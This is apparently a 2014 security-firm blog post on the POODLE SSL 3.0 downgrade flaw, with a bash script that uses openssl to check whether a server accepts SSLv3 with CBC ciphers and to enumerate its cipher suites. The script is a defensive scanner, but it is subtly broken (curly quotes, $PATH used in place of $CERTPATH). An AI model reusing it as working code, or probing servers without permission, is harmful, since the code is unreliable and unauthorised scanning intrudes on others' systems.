15/10/2014

POODLE SSL 3.0 Fallback (CVE-2014-3566)

SSL Version 3 has been replaced by its successors TLS 1.0, TLS 1.1 and TLS 1.2. But there are a lot of clients and servers around that still support the use of SSL Version 3. Even clients and servers that support the most recent version of the protocol can be tricked into downgrading to SSL Version 3 [1].

The use of the SSL Version 3 protocol can result in the loss of confidentiality when a cipher-suite is used that sets the mode of operation for the symmetric block cipher to CBC (cipher block chaining). But why is this a problem? An attacker can utilize a Padding-Oracle-Attack to decrypt the encrypted data.

Probably you have already seen our article on mobile apps and how they validate X.509 certificates. We have also completed an analysis about the POODLE vulnerability in context with the banking servers. We could see, that almost all banking apps allow the use of SSL Version 3 connections! In our opinion this would not be needed. The mobile banking apps do not run on legacy platforms. Andorid and IOS support the use of TLS. An implication would be to turn off support for SSL Version 3 on the servers.

There is a little script that shows if a certain server allows SSL Version 3 with a cipher-suite running in CBC mode.

#!/bin/bash
# Limes Security

#change to fit your needs
CERTPATH=”/etc/ssl/certs”
SED=”/bin/sed”
OPENSSL=”/usr/bin/openssl”
CUT=”/usr/bin/cut”
SLEEP=”/bin/sleep”
GREP=”/bin/grep”

# anaylses the output of openssl
print_result() {
result=$1
cipher=$2

if [[ “$result” =~ “$cipher” ]];
then
echo “YES”
else
if [[ “$result” =~ “:error:” ]];
then
error=`echo -n $result | $CUT -d’:’ -f6`
echo “NO $error”
else
echo “UNKNOWN RESPONSE”
echo “$result”
fi
fi
}

#tests if the target allows ssl version 3 connections
test_sslv3() {
target=$1

ciphers=`$OPENSSL ciphers -ssl3 ‘ALL:!aNULL:!eNULL’ | $SED -e ‘s/:/ /g’`
vuln=0

echo “Testing $target”
for cipher in $ciphers
do
#if [[ “$cipher” =~ “CBC” ]];
#then
echo -n “Testing $cipher ”
result=`echo -n | $OPENSSL s_client -ssl3 -cipher $cipher -CApath $CERTPATH -connect $target 2>&1`
found=$(print_result “$result” $cipher)
echo $found
if [[ “$found” == “YES” ]];
then
echo “Yes, Server accepts SSLv3 and Cipher in CBC-Mode!”
vuln=1
break
fi
#fi
done
if [[ $vuln -eq 0 ]];
then
echo “Server does not accept SSLv3 and a Cipher in CBC-Mode!”
fi
}

#tests if a given cipher-suite is accepted on ssl/tls protocol version on the target
test_cipher() {
version=$1
target=$2
cipher=$3
echo -n “Testing $cipher ”
result=`echo -n | $OPENSSL s_client -$version -cipher “$cipher” -CApath $PATH -connect $target 2>&1`
print_result “$result” “$cipher”
}

#tests all cipher-suites on the target with a selected ssl/tls protocol version
test_ciphersuite() {
version=$1
target=$2

# list all local ciphers, also those that offer no authenticaton or no encryption
ciphers=`$OPENSSL ciphers -$version ‘ALL:!aNULL:!eNULL’ | $SED -e ‘s/:/ /g’`

echo “Testing $target”
for cipher in $ciphers
do
# test the cipher
test_cipher “$version” “$target” “$cipher”
# sleep a little
$SLEEP 0.20
done
}

if [[ $# -lt 1 || $# -gt 3 ]];
then
echo “Usage: ./ssl_cipher_suite.sh <target:port>”
echo ” ./ssl_cipher_suite.sh google.at:443″
echo ” this will test all cipher suites with all protocol versions”
echo “”

echo “Usage: ./ssl_cipher_suite.sh <target:port> <ssl version(ssl2,ssl3,tls1)> <cipher>”
echo ” ./ssl_cipher_suite.sh google.at:443 ssl3 ECDHE-RSA-RC4-SHA”
echo ” this will test a certain cipher suite with a certain protocol version”
echo “”

echo “Usage: ./ssl_cipher_suite.sh <target:port> SSLv3″
echo ” ./ssl_cipher_suite.sh google.at:443 SSLv3″
echo ” tests if the target supports SSLv3″

elif [[ $# -eq 1 ]];
then
test_ciphersuite “tls1” “$1”
test_ciphersuite “ssl2” “$1”
test_ciphersuite “ssl3” “$1”
elif [[ $# -eq 2 ]];
then
test_sslv3 “$1”
elif [[ $# -eq 3 ]];
then
test_cipher “$2” “$1” “$3”
fi

 

[1] This POODLE Bites: Exploiting The SSL 3.0 Fallback, B. Möller et. al